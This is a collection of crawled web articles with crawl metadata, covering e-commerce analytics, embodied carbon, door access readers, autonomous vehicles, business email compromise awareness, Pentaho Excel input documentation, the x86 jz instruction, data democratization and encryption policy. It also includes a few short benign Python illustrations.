Companies that do not have mobile friendly websites will continue to see a decline in traffic to their pages. 5. Virtual reality advancements in the retail world Big data and virtual reality are two of the biggest technological innovations in the world right now, and their connection only enhances their effectiveness. Together, big data and virtual reality are revolutionizing the e-commerce world. They offer the tools businesses need to more efficiently present their brand, advertise and offer an evolving shopping experience for customers – right from the comfort of their homes. Virtual reality can analyze big data and change actions based on its findings, often without the help of a human. We can expect to see even more virtual reality and streamlined shopping experiences soon, thanks in large part to big data. The big data revolution has only enhanced the e-commerce process, making it easier for online stores to be successful and useful. For e-commerce store owners looking to get ahead, big data provides a wealth of tools needed to find success. In 2018, e-commerce will continue to evolve with big data, taking online shopping to a whole new level.
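As a small, optional illustration of the "spikes in demand" analysis mentioned in the shopper-analysis section, the Python sketch below flags days whose product-search counts sit well above the recent average. The counts and threshold are invented for the example.

```python
# Toy spike detection over daily product-search counts (illustrative only).
from statistics import mean, stdev

daily_searches = [120, 131, 118, 125, 140, 610, 133]  # hypothetical counts for one product

def spikes(counts, threshold=2.0):
    """Return (day_index, count) pairs more than `threshold` standard deviations above the mean."""
    mu, sigma = mean(counts), stdev(counts)
    return [(i, c) for i, c in enumerate(counts) if sigma and (c - mu) / sigma > threshold]

print(spikes(daily_searches))  # e.g. [(5, 610)]: a demand spike worth investigating
```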
<urn:uuid:d9bd025b-0c25-40f5-ac98-6d512b912292>
CC-MAIN-2022-40
https://dataconomy.com/2018/02/5-ways-big-data-analytics-will-impact-e-commerce-2018/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.940048
893
2.59375
3
The future we face is a challenging one and so deserves a brief recap to set the stage. As the density of carbon in our atmosphere increases, the planet warms. Far from being a simple change in temperature, the knock-on effects are legion and becoming more apparent every year. Fires, floods, droughts, and extreme temperature swings are becoming the norm, and these changes appear to be growing in both intensity and duration. It's interesting to note that Bill McKibben's book "Eaarth: Making a Life on a Tough New Planet" is now eleven years old, and much of its thesis is coming to pass. The fundamental orientation the book offers is this: stop thinking of the earth as we have known it, and start thinking of it as a new world that we must find a way of making a living on. What is inspiring about this mindset is that it avoids the two mental traps that discussions of climate change tend to create. When bringing up the subject, most people default either to business-as-usual denial or to apocalyptic fatalism. Neither is helpful, and both are delusional and utterly passive. What we have here is an opportunity, a frontier! There are many ways in which this frontier is being explored. For the past decade or so in the architecture profession, we have been focusing on creating buildings that reduce energy consumption and, by proxy, carbon. Specifically, we have been focusing on operational energy/carbon. This means reducing the energy it takes to provide for human comfort and occupation: think lights, power, heating and cooling. Many great strides have been made, supported by both the building industry and regulatory bodies demanding better building performance. But this is only part of the picture when it comes to reducing energy and carbon in buildings. Recently there has been an increased awareness of and focus on embodied energy/carbon. This means the energy used and carbon emitted by the construction and maintenance of buildings. It means looking deeply into how building products are made, where raw materials are sourced from, how they are processed, how far they must travel to the site, and so on. Interestingly, this also creates a higher value in buildings that have already been built, as their embodied carbon has already mostly been emitted. In the timeframe we have left to make a measurable dent in global warming, a focus on embodied carbon is essential for the building industry. If there are three key issues poised to change the way we build in the 21st century, this is number one. There are two aspects in much need of attention: the creation of new suites of building materials and the development of new, robust and rapid means of measuring embodied carbon. Taken as a whole, most current systems of construction are very carbon intensive. Awareness of this has been changing in the last few years, with an emphasis on recycling materials. While structural steel currently contains about 98% recycled content, the reforming process still ultimately emits a fair amount of carbon. There is great promise in mass timber construction, but its cost is still high and building codes have not yet adapted to allow it to be widely used. These point in a positive direction, but much more is needed, particularly with building enclosure systems. Most exterior wall systems contain a fair amount of aluminum, which carries a heavy carbon footprint; ditto petroleum-based (but very cost-effective) insulation. These systems in particular are ready for a disruptor in their industry. The embodied carbon measurement methodology has been in discussion for years.
A mantra in management circles is "you can't manage what you can't measure." The Carbon Leadership Forum, a non-profit based in Washington State, has been developing a robust measurement methodology since 2009. In September of 2019, it released the EC3 (Embodied Carbon in Construction Calculator) tool, which is a massive step forward, and yet it is not the only measurement and reporting solution possible. My own company is funding a team to develop internal, commercial-grade software, embedded in our design process, to address embodied carbon. One is reminded of the early days of the personal computer. As it turned out, IBM didn't end up owning the market, and the name of the game changed from producing better hardware to producing better software. Likewise here, there is much room to develop different approaches to managing and representing the data regarding embodied carbon. These new approaches will be flexible enough to fit the working methodologies of their target clients, be they architects looking for better insight into their design decisions or materials suppliers looking for a new breakthrough in their product lines. The business may indeed move beyond selling software as a product to offering carbon tracking as a service. The historian Walter Prescott Webb noted that there were three key technologies that enabled the settlement of the Great Plains of North America: the revolver pistol, the windmill water pump, and industrially produced barbed-wire fencing. We now face a new, environmentally driven wilderness where technology will play a key role in making a good life. We in the building industry eagerly await the arrival of more building material systems and analytical tools that will enable our progress. We are ready to take on the challenges of the 21st-century frontier.
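To show the basic arithmetic behind any embodied carbon calculator (quantity of each material multiplied by its emission factor, then summed), here is a toy Python sketch. The factors and quantities are placeholders, not real EPD values, and tools like EC3 handle far more nuance.

```python
# Toy embodied-carbon tally: sum(quantity x emission factor) per material (illustrative only).

# Placeholder factors in kg CO2e per unit -- NOT real EPD values.
FACTORS = {
    "concrete_m3": 300.0,
    "steel_kg": 1.9,
    "timber_m3": -700.0,   # negative to represent sequestered carbon in this toy model
}

bill_of_materials = {      # hypothetical quantities for a small structure
    "concrete_m3": 450,
    "steel_kg": 32_000,
    "timber_m3": 60,
}

def embodied_carbon(bom, factors):
    """Return total kg CO2e and a per-material breakdown."""
    breakdown = {m: qty * factors[m] for m, qty in bom.items()}
    return sum(breakdown.values()), breakdown

total, breakdown = embodied_carbon(bill_of_materials, FACTORS)
for material, kg in breakdown.items():
    print(f"{material:12s} {kg:>12,.0f} kg CO2e")
print(f"{'total':12s} {total:>12,.0f} kg CO2e")
```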
<urn:uuid:3bb43108-7b4e-4fb4-910c-af09071d737f>
CC-MAIN-2022-40
https://iconoutlook.com/a-new-frontier-in-the-making-of-a-post-carbon-future/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.963861
1,021
2.703125
3
Comparison of Door Readers Used in Access Control Systems A door reader is an integral part of a door access control system. It is the interface between the person at the door and the rest of the access control system. We have come a long way since the early magnetic stripe cards. The new door readers can read RFID card credentials, mobile phone credentials, and biometric credentials. Some of the door readers are combinations of a reader and a controller. This means that all the intelligence is built into the reader at the door. This reader-controller connects to the network. This article provides a comparison of available door access control readers. What is a Door Access Control Reader? An access control door reader is a device placed at an entry point that is used to determine if a person can enter the door. The door reader reads a credential that is presented by the person entering. The credential is something that a person carries (like a card) or a biometric signature such as a fingerprint. If the credential ID (or biometric identifier) matches the registered access control list, the electric door lock is opened. Proximity Door Readers Proximity RFID readers connect to an access controller such as the Hartmann controller, using the Wiegand or OSPD (Open Supervised Device Protocol) interface. You can select readers for indoors or outdoors applications. Some readers include keypads that can be used instead of a credential or enhance security by requiring a secondary access code. There is a choice of economic credentials such as cards and keyfobs. There are 125 kHz frequency credentials and 13.56 MHz frequency credentials used by Smart cards (or Mifare). A few readers can handle both frequencies. RFID is a Radio Frequency Identification signal that is used to communicate between the credential and the door reader. The credential (a card, keyfob, or tag) contains an antenna, responding electronics, and an identification number. The reader broadcasts a signal that is received by the credential antenna. The broadcasted electrical signal from the door reader contains enough power to energize the circuit in the credential. Once the electric circuit in the credential receives enough power, it sends back a signal to the access control reader that includes its identification (ID) number. Some readers, such as the Isonas reader, have the controller built-in. This reduces the wiring and makes it easy to install. Readers that Use Your Mobile Phone as the Credential Smartphones can be used as a credential. This is a nice touchless door entry method that saves money on card credentials. The app on your smartphone provides the ID to the door reader. The Isonas reader-controller is an example of a door entry device that can read both RFID proximity credentials and mobile credentials. The Hartmann Enterprise Door Access Control System includes more sophisticated mobile readers that provide a variety of methods for opening. For example, you can wave your hand in front of the reader without taking out your phone. Since mobile phones use biometrics to use them, it provides increased security. Biometric Door Readers Biometric readers are the most secure entry control device. You can forget your card credential, but not your face or finger. You don’t have to worry about your fingerprint or face being stolen. Instead of storing a picture of our actual fingerprint or face, the biometric readers capture only a small subset of data and convert these minutiae points to encrypted binary data. 
The code can only be retrieved using a mathematical algorithm that has no physical relationship to the biometric. Most fingerprint readers are used indoors. The TVIP3F-ProWP is one of the few biometric readers that can be used outdoors. The basics are simple. Each person’s fingerprint is unique, and the pattern created by the fingerprint has been quantified by law enforcement. It includes several basic patterns such as arch, loop, and whorl that are used for identification. Many fingerprint readers can also use card credentials or PINs to control entry. Select the fingerprint reader… Vein pattern recognition dramatically increases the reliability of the biometric reader. The multi-biometric capability processes the vein pattern under the finger as well as the fingerprint. This biometric information is captured and converted to a biometric template. The matching and verification algorithm is more accurate than using fingerprints. These specialized facial recognition systems use cameras to capture the full facial image. The software then uses various computer algorithms to build a definition data set, including machine learning. Facial recognition indoors is more reliable than outdoors because the changing light makes the recognition process difficult. The TVIP-Face8WP face recognition panel is one of the few outdoor devices because it has intelligence that allows operation in changing light and weather conditions. Our article, Face Recognition for Door Access Control, provides more details about access control technology. Over the last year, new face recognition panels have been introduced with temperature measurement. This allows any organization to check the identity and the temperature of the person entering. These panels can control a door, make audio announcements, detect if a person is wearing a mask, and notify a central security person over the network. Learn more… Smart Intercom Door Systems for Apartments and Multi-tenant Organizations An apartment intercom is a communication device used in the lobby or at the front entrance of a multi-tenant building or apartment house. It provides a connection to the tenants. This type of reader-controller is used to control visitors. Some units also include RFID-type capability that allows the tenants to enter the building. The new wireless intercom allows you to contact the resident’s smartphone or standard phone to request entry into the building. The lobby intercom display provides a list of all the tenants in the building. Summary of Door Readers There are many different types of door reads. The best kind of reader depends on your application. The door readers can connect to a controller or can include built-in controllers. The biometric readers provide the highest level of security, while the RFID-type readers cost less. Specialized readers with controllers have advanced capabilities such as smartphone credentials, intercoms, and visitor control. To learn more about door readers for access control, please get in touch with us at 800-431-1658 in the USA or 914-944-3425 everywhere else, or use our contact form.
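To illustrate the core decision every reader-controller makes (does the presented credential ID appear on the access control list for this door, right now?), here is a deliberately simplified Python sketch. The credential IDs, door names and schedule rule are hypothetical, and real systems add encrypted credentials, audit logging and much more.

```python
# Toy door-controller decision: match a presented credential against an access list (illustrative only).
from datetime import datetime

ACCESS_LIST = {  # hypothetical credential IDs -> doors the holder may open
    "04A1B2C3": {"front_door", "lab"},
    "09F8E7D6": {"front_door"},
}

def decide(credential_id: str, door: str, now: datetime) -> bool:
    """Return True to energize the electric strike, False to keep the door locked."""
    allowed_doors = ACCESS_LIST.get(credential_id, set())
    in_hours = 7 <= now.hour < 19          # example schedule restriction
    return door in allowed_doors and in_hours

print(decide("04A1B2C3", "lab", datetime(2022, 3, 1, 9, 30)))   # True -> unlock
print(decide("09F8E7D6", "lab", datetime(2022, 3, 1, 9, 30)))   # False -> stay locked
```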
<urn:uuid:592e64d1-278f-410c-8030-d018f805cfef>
CC-MAIN-2022-40
https://kintronics.com/door-readers-for-everyone/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00068.warc.gz
en
0.898384
1,319
2.59375
3
Vehicle manufacturers have been investing heavily in the development of Advanced Driver-Assistance Systems (ADASs) over the past decade, and in the last year, US-based self-driving startups received a staggering $4.5bn worth of VC funding. As investment pours into the sector the potential applications of autonomous technologies continue to expand, but how will driverless vehicles evolve over the next decade? And how will these developments impact our cities? Widespread integration of ADAS Early iterations of ADASs offered assistance with basic system monitoring and warnings, but in recent years ADASs have evolved to encompass more advanced tasks now often associated with autonomous vehicles, such as parking, breaking and steering. Vehicle manufacturers and major technology players are both investing heavily in autonomous technologies, and with pioneers in the space demonstrating their capabilities, it’s highly likely that we’ll see more advanced ADASs integrated into commercial vehicles in the next two to three years. Ultimately, the introduction of high-level ADA Systems will prove beneficial to a wide range of road users. Not only are we likely to see autonomous vehicles being used across short distances to move people along pre-planned routes in shuttle-like services, but we’ll also see long-distance hauliers benefit from the support that ADA Systems can provide drivers. Collectively, these technologies will not only reduce congestion – particularly in densely populated cities – but also help to reduce road accidents. Underpinning the development of these high-level assistance systems will be improvements in the sensors that they rely on. These developments (including increased range and accuracy on lidars, radars and cameras) will also be supported in improvements to General Processing Units (GPUs), which will allow Autonomous Vehicles’ (AVs) onboard computers to process sensor data faster and more accurately. 5G deployment will also promote further innovation in the AV space, particularly as connected devices become more integrated into our cities. The increased number of smart devices and sensors within cities will provide AVs with data that embedded sensors will not have access to, such as traffic. A deeper understanding of the limitations of AI and deep learning will also help to mitigate the risks inherent to these technologies, in turn allowing the industry to utilise it in the most effective ways possible. Prioritisation of safety The safety of both passengers and pedestrians will be fundamental to the evolution of AVs over the next decade. The best way to ensure that AVs and inhabitants can interact and co-exist safety within densely populated areas is to review and re-engineer city centres and the variety of transportation solutions that serve them. The majority of today’s cities have been designed to prioritise ease of access for vehicles, not for pedestrians. However, in an era of rapid growth for cities across the globe, more and more city leaders are re-evaluating who their cities are designed for. While giving cities back to pedestrians might seem like a somewhat radical move, prioritising walkability within cities doesn’t have to mean the elimination of vehicles entirely. Redesigning urban environments to prioritise pedestrians not only improves the flow of people within community spaces but can also open up opportunities for transport innovation in the form of AVs. 
AVs are able to provide solutions for a wide range of mobility needs for both people and goods at the appropriate speeds for high footfall areas. Slower speeds, additional levels of redundancy, and reduced reliance on GPS mean that low-speed AVs can function safely in densely populated city centre environments with tall buildings and trees. This can offer inhabitants a short-distance transport option that is not only efficient but also environmentally conscious. Longer distance higher speed autonomous transportation solutions will also continue to develop further over the coming years in a bid to reduce emissions and ease congestions within cities and the expanding suburbs that surround them. One solution, Autonomous Rapid Transport (ART), presents an exciting opportunity for improving road safety in cities and the surrounding areas. This rapid transport solution, involves a high frequency of AV shuttles operating in segregated road lanes and can offer a more efficient, flexible and frequent service than alternative bus or shuttle offerings while removing the need for a human driver and increasing safety. How autonomy will impact cities Autonomous vehicles are already altering the landscape of our cities slowly, and as these solutions get deployed more widely, the change will become increasingly tangible. In cities across the globe, it seems that single occupancy cars remain the default mode of transportation. However, as our cities continue to grow, city planners are increasingly looking for ways to improve walkability and promote transport solutions that are smart, electric and shared. As urban environments become increasingly pedestrianised, city centres will likely become more compact and walkable, linked by efficient public transport networks and autonomous transport solutions including on-demand ride hailing and shuttle like services. As these services become more readily available, inhabitants will start to use the most time efficient, convenient, and sustainable transport solutions available to them. These options will vary between cities, but the most progressive will likely embrace a number of options, including drones, autonomous shuttles and ride-hailing services, scooter and bike sharing services. As these solutions provide greater convenience to city inhabitants, traditional car ownership will begin to decline, and peer-to-peer services and platforms will rise in popularity. Investment into autonomous vehicles will undoubtedly continue to rise in the coming years, with a recent report from Intel predicting that the mobility-as-a-service market will scale from $800bn in 2035 to a staggering $7tn by 2050. The Accelerating the Future study also revealed that autonomous vehicles are predicted to save more than 580,000 lives between 2035 and 2045 – highlighting the importance of prioritising safety in any future developments. As the technology that supports autonomous vehicles improves and becomes increasingly more accurate, the applications and prevalence of these vehicles on our roads and in our cities will multiply. While fully autonomous high-speed vehicles are still more than a decade away, low-speed solutions are already beginning to shape the nature of cities, fundamentally altering and improving, the lives of its inhabitants. Adrian Sussmann, President, COAST Autonomous (opens in new tab) Image Credit: Karsten Neglia / Shutterstock
Malicious groups and individuals continue to be highly active online in 2019 – highlighting the importance of robust education, processes and technology to organisations in tackling cyber-crime. Fraudulent 'phishing' messages that aim to trick people into disclosing sensitive information pose an ongoing and increasingly sophisticated threat. These scam messages – typically delivered over email – use a variety of techniques to convince the recipient they are legitimate communications, including the use of authentic logos, text and designs from trusted organisations.

Phishing messages may also include links to fake versions of legitimate websites. These fake websites aim to trick a visitor into entering details such as usernames or passwords. Messages may also include attachments loaded with malicious software that aims to infect a computer to disrupt its operations or capture sensitive information.

While variations such as 'spear-phishing' – which occurs when malicious groups target an individual by using his or her personal information to elicit sensitive information – are well known, business email compromise is a comparatively new but increasingly potent threat. Business email compromise occurs when a group or individual impersonates a business representative – often a senior executive – at an organisation to trick employees, vendors or customers into transferring money or sensitive information to the malicious party. The FBI noted in mid-2018 that the incidence of 'identified global exposed losses' from business email compromise had risen 136% between December 2016 and May 2018 – with the real estate sector a prime target.

The Australian Cyber Security Centre (ACSC) noted in October 2018 that "criminals are constantly developing increasingly sophisticated business email compromise techniques [that] often include a combination of social engineering, email phishing, email spoofing [forging an email sender's address] and malware [malicious software]" to trick recipients. Importantly for many organisations, the ACSC notes that business email compromise attacks tend to spike around tax time – when many people are busy and under pressure to complete workplace tasks quickly.

So how can your organisation protect itself against business email compromise? The ACSC has published comprehensive information about the types of business email compromise, how to recover from an incident, and techniques for minimising the risk of being caught out by this type of attack.

By Roger Carvosso, Product and Innovation Director
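One technical control that complements the process advice above is email authentication. As a minimal, hedged illustration (not drawn from the ACSC guidance, and using a placeholder domain), the snippet below uses the open-source dnspython library to check whether a domain publishes SPF and DMARC records, two DNS-based mechanisms that make sender-address spoofing harder:

```python
# Hypothetical helper: check a domain's SPF and DMARC DNS records.
# Requires the third-party dnspython package (pip install dnspython),
# version 2.x for dns.resolver.resolve().
import dns.resolver

def check_email_auth(domain: str) -> None:
    # SPF lives in a TXT record on the domain itself.
    for rdata in dns.resolver.resolve(domain, "TXT"):
        txt = b"".join(rdata.strings).decode()
        if txt.startswith("v=spf1"):
            print(f"SPF record for {domain}: {txt}")
    # DMARC lives in a TXT record on the _dmarc subdomain.
    for rdata in dns.resolver.resolve(f"_dmarc.{domain}", "TXT"):
        txt = b"".join(rdata.strings).decode()
        if txt.startswith("v=DMARC1"):
            print(f"DMARC record for {domain}: {txt}")

check_email_auth("example.com")  # placeholder domain
```

A missing or permissive DMARC policy (for example, p=none) is one signal that a domain is easier to spoof, which is exactly what business email compromise relies on.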
You can use the Microsoft Excel Input step to read data from Microsoft Excel. The following sections describe each of the available features for configuring this step.

The default spreadsheet type is set to Excel 97-2003 XLS. When you are reading other file types, such as OpenOffice ODS or Excel 2007, and using special functions like protected worksheets, you need to change the Spread sheet type (engine) in the Files tab accordingly. If you are using password protected worksheets, you must set Spread sheet type (engine) to Excel 2007 XLSX (Apache POI).

Enter the following information in the transformation step name field:

- Step name: Specifies the unique name of the Microsoft Excel Input transformation step on the canvas. You can customize the name or leave it as the default.

You can use Preview rows to display the rows generated by this step. The Microsoft Excel Input step determines what rows to input based on the information you provide in the option tabs. This preview function helps you to decide if the information provided accurately models the rows you are trying to retrieve.

The Microsoft Excel Input step features several tabs with fields. Each tab is described below.

Files tab

Use the Files tab to enter the following options to define the location of the Microsoft Excel source files:

| Option | Description |
|---|---|
| Spread sheet type (engine) | Select the spreadsheet type, such as Excel 97-2003 XLS, OpenOffice ODS, or Excel 2007 XLSX (Apache POI). |
| File or directory | Specify the source location if the source is not defined in a field. Click Browse to navigate to your source file or directory. Click Add to include the source in the Selected files table. |
| Regular expression | Specify a regular expression to match filenames within a specified directory. |
| Exclude regular expression | Specify a regular expression to exclude filenames within a specified directory. |
| Password | Specify the password to open the Excel file when password protection is set. |
| Accept filenames from previous steps | Select the previous step that contains file names and the input field for reading in your data. |

Selected files table

The Selected files table shows files or directories to use as source locations for input. This table is populated by specifying File or directory, then by clicking Add. The Microsoft Excel Input step tries to connect to the specified file or directory when you click Add to include it in the table. The table contains the following columns:

| Column | Description |
|---|---|
| File/Directory | The source location indicated by clicking Add |
| Wildcard (RegExp) | Wildcards as specified in Regular expression |
| Exclude wildcard | Excluded wildcards as specified in Exclude regular expression |
| Required | Required source location for input |
| Include subfolders | Whether subfolders are included within the source location |

Click Delete to remove a source from the table. Click Edit to remove a source from the table and return it to the File or directory option. Use Show filename(s) to display the file names of the sources successfully connected to the Microsoft Excel Input step.
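As an illustration of the Regular expression and Exclude regular expression options in the Files tab above (the patterns below are examples, not defaults of the step, and PDI regular expressions are assumed here to follow the usual Java syntax, since the tool is Java-based):

```
.*\.(xls|xlsx)$
invoice_2022.*\.xls
```

The first pattern matches any file ending in .xls or .xlsx; the second matches only XLS files whose names start with invoice_2022. The Exclude regular expression option accepts patterns in the same syntax.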
Sheets tab

Use the table in the Sheets tab to specify which worksheets and grid locations to read data from in the Microsoft Excel source files. The table contains the following columns:

| Column | Description |
|---|---|
| Sheet name | The name of the sheet in the Excel workbook to read |
| Start row | The starting row in the sheet to read. The row numbers are zero-based (start at the number 0). |
| Start column | The starting column in the sheet to read. The column numbers are zero-based (start at the number 0). |

You can also read all the sheets in a workbook by clearing the table and typing only the start row and column in the first row, which will then be used for all sheets. To read all the sheets in a workbook, do not specify any sheet name (leave Sheet name blank). In this case, the field structure of each sheet needs to be the same. Click Get sheetname(s) to fill out the table with all the sheets from the source specified by File or directory in the Files tab.

Content tab

Use the Content tab to configure which data values to retrieve. The following options are available:

| Option | Description |
|---|---|
| Header | Select if the sheets specified in the Sheets tab contain a header row to skip. |
| No empty rows | Select if you do not want empty rows to appear in the output of this step. |
| Stop on empty rows | Select to stop reading the current sheet of a file when an empty line is encountered. |
| Limit | Specify a limit on the number of records generated from this step. Results are not limited when set to zero. |
| Encoding | Specify which text file encoding to use. Leave this option blank to use the default system encoding. On first use, PDI searches your system for available encodings. To use Unicode, specify UTF-8 or UTF-16. |

Error Handling tab

The Error Handling tab allows you to configure the following properties:

| Option | Description |
|---|---|
| Strict types? | Select to have PDI report data type errors while reading. |
| Ignore errors? | Select if you want to ignore errors during parsing. These lines can be dumped to a separate file by specifying a path in Warnings file directory, Error files directory, and Failing line numbers files directory. Clear this option to have lines with errors appear as NULL values in the output of this step. |
| Skip error lines? | Select to have PDI skip lines that contain errors. |
| Warnings file directory | Specify the location of the directory where warnings are placed if they are generated. The name of the resulting file is <warning dir>/filename.<date_time>.<warning extension>. |
| Error files directory | Specify the location of the directory where errors are placed if they occur. The name of the resulting file is <errorfile_dir>/filename.<date_time>.<errorfile_extension>. |
| Failing line numbers files directory | Specify the location of the directory where parsing errors on a line are placed if they occur. The name of the resulting file is <errorline dir>/filename.<date_time>.<errorline extension>. |

Fields tab

The Fields tab displays field definitions for extracting values from the Microsoft Excel spreadsheet. The table in this tab contains the following columns:

| Column | Description |
|---|---|
| Name | Name of the field that maps to the corresponding field in the Microsoft Excel Input stream |
| Type | Data type of the input field |
| Length | Length of the field |
| Precision | Number of floating point digits for number-type fields |
| Trim type | The trim method to apply to a string |
| Repeat | The corresponding value from the last row repeated if a row is empty |
| Format | An optional mask for converting the format of the original field. See Common Formats for information on common valid date and numeric formats you can use in this step. |
| Currency | Currency symbol ($ or € for example) |
| Decimal | A decimal point can be a "." (5,000.00 for example) or "," (5.000,00 for example) |
| Group | A grouping can be a "," (10,000.00 for example) or "." (5.000,00 for example) |

Click Get fields from header row to have the step populate the table with fields derived from the source file. All fields identified by this step will be added to the table.
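The Format column accepts masks like those in the Common Formats reference mentioned above. A few illustrative examples (see Common Formats for the authoritative list):

```
yyyy/MM/dd HH:mm:ss
yyyy-MM-dd
#,##0.00
0.00;-0.00
```

The first two are date masks (for values such as 2022/10/06 12:30:00 and 2022-10-06); the last two are numeric masks controlling grouping, decimal places, and the rendering of negative numbers.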
See Understanding PDI data types and field metadata to maximize the efficiency of your transformation and job results.

Additional output fields tab

The Additional output fields tab contains the following options to specify additional information about the file to process:

| Option | Description |
|---|---|
| Full filename field | Specify the field that contains the full file name plus the extension. |
| Sheetname field | Specify the field that contains the name of the worksheet you want to use. |
| Sheet row nr field | Specify the field that contains the current sheet row number you want to use. |
| Row nr written field | Specify the field that contains the number of rows written. |
| Short filename field | Specify the field that contains the filename without path information but with an extension. |
| Extension field | Specify the field that contains the extension of the filename. |
| Path field | Specify the field that contains the path in operating system format. |
| Size field | Specify the field that contains the size of the data. |
| Is hidden field | Specify the field indicating if the file is hidden or not (Boolean). |
| Uri field | Specify the field that contains the URI. |
| Root uri field | Specify the field that contains only the root part of the URI. |

Metadata injection support

You can use the metadata injection supported fields with the ETL metadata injection step to pass metadata to your transformation at runtime. The following option fields and values in the Microsoft Excel Input step support metadata injection:

- File and Directory
- Regular Expression
- Exclude Regular Expression
- Is file Required
- Include subfolders
- Spreadsheet type
- Sheet name
- Sheet start row
- Sheet start col
- Trim Type
- The jz instruction is a conditional jump that follows a test.
- It jumps to the specified location if the Zero Flag (ZF) is set (1).
- jz is commonly used to explicitly test for something being equal to zero, whereas je is commonly found after a cmp instruction.

Syntax:

```asm
jz location
je location
```

Examples:

```asm
test eax, eax          ; test if eax = 0
jz short loc_402B13    ; if condition is met, jump to loc_402B13

dec ecx
jz counter_is_now_zero ; jump once the counter reaches zero

cmp edx, 42
je short loc_402B13    ; if edx equals 42, jump to loc_402B13
```
Predictive analytics is now a strong force in the business world. Still, issues remain. With so much data going around, it's impossible to have enough trained data scientists to glean factual and actionable information out of the various statistics and raw data coming in. As Forbes noted, there's already a shortage of properly credentialed experts in the field, and the nature of business is changing as the potential of data analytics shifts away from IT thanks to custom BI solutions. With this in mind, there's a greater demand for alternatives, and the democratization of data is one path, creating the possibility of a citizen data scientist.

Data for the people

Many see the advent of data democratization not as a complete replacement, but rather a complement to skilled data science with support from trained scientists. With greater advances in BI technology, there's more automation happening at the ground level in terms of data processing. Moreover, key points can still be gleaned from the data without training a person on every aspect of it. Gil Press at Forbes noted that automated processing already has a place in many companies, helping data scientists avoid much of the menial labor involved.

"One way to democratize data is through advanced data modeling."

To give lay analysts a greater degree of control and power over the data they receive, different processes are under way. One is the creation of advanced models by data scientists, which staffers can then use to better assess certain trends or behaviors. This form of forecasting benefits analysts because they can process information without requiring expertise to glean critical points. Moreover, business professionals don't need complete training just to understand how to make the data models work, and more experienced professionals can tweak the models to accurately reflect certain trends.

Another process worth considering is creating data lakes. TechRepublic defines them as unstructured information sets analysts can assemble themselves for assessment. This solves the major problem of too much data: rather than process every single data point, professionals can hand to scientists what they're actually looking for. This helps improve efficiency in many ways by allowing scientists to focus on what is most important to the business.

Finally, companies don't even need analysts to gather the key data sets. All that's required is the domain understanding that a staffer in marketing or sales, for example, already possesses: knowing which metrics are relevant. Such methods can help unburden data scientists and give firms more control over their information.
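To make the "advanced models built by scientists, used by staffers" idea concrete, here is a minimal sketch of that hand-off. The file names and feature columns are hypothetical, and it assumes scikit-learn and joblib are installed; the point is that the analyst only loads and scores, never trains:

```python
# Minimal sketch of model hand-off; file names and columns are
# hypothetical examples, not from the article.
import joblib
import pandas as pd

# The analyst never touches the training code: they load the model
# that a data scientist trained and saved earlier...
model = joblib.load("churn_model.joblib")

# ...and score this month's customers with it.
customers = pd.read_csv("customers_march.csv")
features = customers[["tenure_months", "monthly_spend", "support_tickets"]]
customers["churn_risk"] = model.predict_proba(features)[:, 1]

print(customers.sort_values("churn_risk", ascending=False).head())
```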
1969 will forever be known as the year humans walked on the moon. Gary Ross Dahl rocked the world again in 1975 with the introduction of the Pet Rock. And MTV celebrated the moon landing and popular culture – and changed the music world – when it launched in 1981. The world remembers 1989 as the year the Berlin Wall fell, opening the door to a unified Germany. It's hard to forget 2008, the year the financial crisis hit. And 2015 was the year of the millennial, when this group surpassed baby boomers as the biggest U.S. generation.

Each year has its defining moments and trends. And 2020 will be the Year of Encryption. Here's why:

Encryption is a key technology in protecting sensitive information such as social security numbers, government IDs and financial data. It is also an important part of personal data privacy – a key consumer and compliance concern. Given the importance of encryption, it is also a subject of debate at the U.S. state and federal level and elsewhere in the world.

The CCPA will help educate the public on consumer privacy, cybersecurity and encryption

The nation's most populous state kicked off 2020 with the California Consumer Privacy Act (CCPA). As of Jan. 1, 2020, California residents have greater control over their personal data. Under the CCPA, organizations are required to disclose what data they have about California residents who request that information. Companies must delete the information of California residents who ask them to do so. And Californians can forbid organizations from sharing their data with other entities.

Residents of the Golden State also now have the right to bring action for statutory damages if their information is subject to a data breach. But, notably, they can do so only in cases in which their personal information is nonencrypted and nonredacted. That is likely to prompt more organizations to employ encryption technology. So is the fact that the CCPA will make consumers more informed about personal data privacy.

Renewed federal efforts will drive debate around encryption, putting it in the spotlight

Lawmakers in the U.S. and elsewhere are also fueling discussion and new action around encryption. In Washington, D.C., there's a new push to require the tech community to create encryption backdoors allowing government entities access to the information. Senators are pushing tech companies to give law enforcement personnel access to encrypted data for investigations into criminal and terrorist organizations. The challenge with any "backdoor" is that a nefarious organization may also discover and utilize the backdoor to access sensitive information – undermining the purpose of encryption.

Meanwhile, government leaders from Australia, the U.K. and the U.S. are urging Facebook to abandon its encryption plans. They sent Mark Zuckerberg an open letter in October voicing their concerns and making this request.

GDPR will keep the conversation going, too, with Brexit adding new fuel to the fire

Then there's the General Data Protection Regulation (GDPR). GDPR has been around for several months now. But many organizations are still implementing and fine-tuning their compliance strategies around this relatively new requirement. And some strategies leverage encryption. Also, the significant GDPR fines regulators are levying for non-compliance continue to generate headlines and calls for better solutions. The fact that Brexit appears to be moving forward is also creating new conversations around GDPR.
Businesses are wondering how the U.K.'s withdrawal from the European Union will impact GDPR requirements in the UK and how to respond.

Encryption could help address concerns about the elections

Four years have passed since the Cambridge Analytica-Facebook scandal and other election meddling activities came to light. Yet concerns remain about how the country can ensure fair elections in 2020 and beyond. Following the 2016 election, WIRED magazine ran a story with this headline: "For the Next Election, Don't Recount the Vote. Encrypt It." And, a couple of months ago, the Massachusetts Institute of Technology debuted a cryptographic voting system.

Whether and when government leaders decide to employ encryption remains to be seen. (If they plan to use it for the elections, they better move fast, as primaries begin next month.) In any case, one thing seems certain: encryption in 2020 will be more readily understood, discussed and debated than ever before. And that's a good thing. Welcome to the Year of Encryption.
Python can be used for everything from web development to software development and data science applications. The Python 3 course is a great introduction to the Python programming language as well as fundamental programming concepts. Python has grown exponentially in popularity as it is a versatile, general-purpose programming language that is concise and easy to read, a good language to have in any programmer's stack. Python 3 is the most up-to-date version of the language, with many improvements made to increase the efficiency and simplicity of the Python code that you write. Below is a breakdown of the key areas of the Python 3 course (a short example combining several of these concepts follows the list):

